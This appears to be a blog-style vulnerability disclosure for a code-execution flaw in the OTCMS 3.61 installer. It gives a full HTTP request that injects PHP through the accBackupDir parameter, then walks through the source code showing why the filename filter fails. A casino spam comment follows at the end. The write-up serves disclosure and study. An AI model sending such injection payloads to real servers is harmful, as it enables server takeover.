OTCMS 3.61 Command Execution
OTCMS 3.61 Command Execution
Description
OTCMS 3.61 has caused code execution vulnerabilities during installation.Affected parameters: accBackupDir=a',phpinfo(),'a
Request Packet:
POST /OTCMS_PHP_V3.61_20180806/install/index.php?mudi=run HTTP/1.1
Host: 192.168.159.148
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.159.148/OTCMS_PHP_V3.61_20180806/install/index.php?mudi=config
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Cookie: qshZy_userID=1; qshZy_username=ss123; qshZy_userInfo=AjsBD10hD39QMA9uWGoCDlNmUTRZZVY1UmIEMAcxCzgDMw44DDYBOlUxBWRbaAI1VzBQM1FrAGBRNFFkVGVROAJvATJdZg9uUGQPOFhsAjZTDFEPWQhWZlIvBDIHfgsw; qshZy_usercall=ssssss; PHPSESSID=mubrngtpmvp2dvpuaoe7pkfgb0
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
adminName=admin&adminPwd=admin&adminDir=admin&dbType=mysql&accName=&accDir=&sqlIp=localhost&sqlPo=3306&sqlUsername=root&sqlUserPwd=123.a&sqlDbName=OTCMS&sqlPref=OT_&isImport=2&mysqlState=1&accBackupDir=a',phpinfo(),'a
visit homepage:
http://192.168.159.148/OTCMS_PHP_V3.61_20180806/
Code analysis
index.php
83 line: execute run()
case 'run':
WebTop();
run();
WebBottom();
break;
862 line : run()
function run(){
global $DB,$dbServerName,$dbName;
$adminName = OT::PostStr('adminName');
$adminPwd = OT::PostStr('adminPwd');
$adminDir = OT::PostRegExpStr('adminDir','fileName');
$isSkipChk = OT::PostInt('isSkipChk');
$dbType = OT::PostStr('dbType');
$accDir = OT::PostRegExpStr('accDir','fileName');
$accName = OT::PostRegExpStr('accName','fileName');
$sqlIp = OT::PostStr('sqlIp');
$sqlPo = OT::PostInt('sqlPo');
$sqlUsername = OT::PostStr('sqlUsername');
$sqlUserPwd = OT::PostStr('sqlUserPwd');
$sqlDbName = OT::PostStr('sqlDbName');
$sqlPref = OT::PostStr('sqlPref');
$isImport = OT::PostInt('isImport');
$isMysqlClass = OT::PostInt('isMysqlClass');
$accBackupDir = OT::PostRegExpStr('accBackupDir','fileName');
OTCMS_PHP_V3.61\OTCMS_PHP_V3.61_20180806\inc\classOT.php : 55 line:
public static function PostRegExpStr($str,$repType){
return Str::RegExp(@$_POST[$str],$repType);
}
OTCMS_PHP_V3.61\OTCMS_PHP_V3.61_20180806\inc\classStr.php: 276 line
case 'fileName':
$pattern = "/(\\\\|\\/|\\:|\\*|\\?|\\\"|<|>|\|)/i";
return preg_replace($pattern,'',$str);
break;
so bypass pattern
This web site is really a stroll-through for all the info you wished about this and didn’t know who to ask. Glimpse here, and also you’ll positively discover it. best online casino
回复删除